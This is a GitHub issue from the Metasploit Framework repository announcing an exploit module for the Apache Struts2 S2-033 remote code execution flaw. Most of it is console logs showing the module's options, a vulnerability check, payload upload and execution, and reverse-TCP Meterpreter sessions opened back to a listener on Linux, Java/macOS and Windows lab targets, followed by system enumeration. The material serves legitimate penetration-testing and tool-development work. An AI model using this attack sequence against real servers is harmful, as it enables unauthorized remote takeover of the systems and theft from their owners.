rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/

[Require] Apache Struts2 S2-033 RCE #6944

Closed nixawk closed 8 years ago

nixawk commented 8 years ago

https://struts.apache.org/docs/s2-033.html
https://www.seebug.org/vuldb/ssvid-91741

I'll try a new PR against Apache Struts2 S2-033, which is similar to Apache Struts2 S2-032.

Linux Stager

msf exploit(struts_dmi_rest_exec) > show options

Module options (exploit/multi/http/struts_dmi_rest_exec):

   Name       Current Setting                  Required  Description
   ----       ---------------                  --------  -----------
   Proxies                                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      172.16.176.226                   yes       The target address
   RPORT      8080                             yes       The target port
   SSL        false                            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /struts2-rest-showcase/orders/3  yes       The path to a struts application action
   TMPPATH                                     no        Overwrite the temp path for the file upload. Needed if the home directory is not writable.
   VHOST                                       no        HTTP server virtual host

Payload options (linux/x86/meterpreter/reverse_tcp):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   DebugOptions  0                no        Debugging options for POSIX meterpreter
   LHOST         172.16.176.1     yes       The listen address
   LPORT         4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   1   Linux Universal

msf exploit(struts_dmi_rest_exec) > check
[+] The target is vulnerable.
msf exploit(struts_dmi_rest_exec) > run

[*] Started reverse TCP handler on 172.16.176.1:4444
[*] 172.16.176.226:8080 - Uploading exploit to /tmp/8wN6, and executing it.
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
[*] Sending stage (1495599 bytes) to 172.16.176.226
[*] Meterpreter session 2 opened (172.16.176.1:4444 -> 172.16.176.226:57188) at 2016-06-06 03:47:18 -0500

meterpreter > sysinfo
Computer     : lab
OS           : Linux lab 4.3.0-kali1-686-pae #1 SMP Debian 4.3.5-1kali1 (2016-02-11) (i686)
Architecture : i686
Meterpreter  : x86/linux
meterpreter >

Java Stager

msf exploit(struts_dmi_rest_exec) > show options

Module options (exploit/multi/http/struts_dmi_rest_exec):

   Name       Current Setting                    Required  Description
   ----       ---------------                    --------  -----------
   Proxies                                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      10.0.246.72                        yes       The target address
   RPORT      8080                               yes       The target port
   SSL        false                              no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /struts2-rest-showcase/orders/32/  yes       The path to a struts application action
   TMPPATH                                       no        Overwrite the temp path for the file upload. Needed if the home directory is not writable.
   VHOST                                         no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   2   Java Universal

msf exploit(struts_dmi_rest_exec) > check
[+] The target is vulnerable.
msf exploit(struts_dmi_rest_exec) > run

[*] Started reverse TCP handler on 10.0.250.22:4444
[*] 10.0.246.72:8080 - Uploading exploit to H4hsjp.jar, and executing it.
[*] Sending stage (46112 bytes) to 10.0.246.72
[*] Meterpreter session 1 opened (10.0.250.22:4444 -> 10.0.246.72:50002) at 2016-06-06 04:52:48 -0500

meterpreter > sysinfo
Computer    : SECLAB
OS          : Mac OS X 10.11.5 (x86_64)
Meterpreter : java/java

Windows Stager

msf exploit(struts_dmi_rest_exec) > exploit
[*] Started reverse TCP handler on 10.0.246.72:4444 
[*] 10.0.246.170:8080 - Uploading exploit to .\cpSd.exe, and executing it.
[*] Sending stage (957999 bytes) to 10.0.246.170
[*] Meterpreter session 1 opened (10.0.246.72:4444 -> 10.0.246.170:49216) at 2016-06-06 18:20:37 +0800

meterpreter > sysinfo
sysinfo
Computer        : seclab
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 2

nixawk commented 8 years ago

Thanks, and close the issue.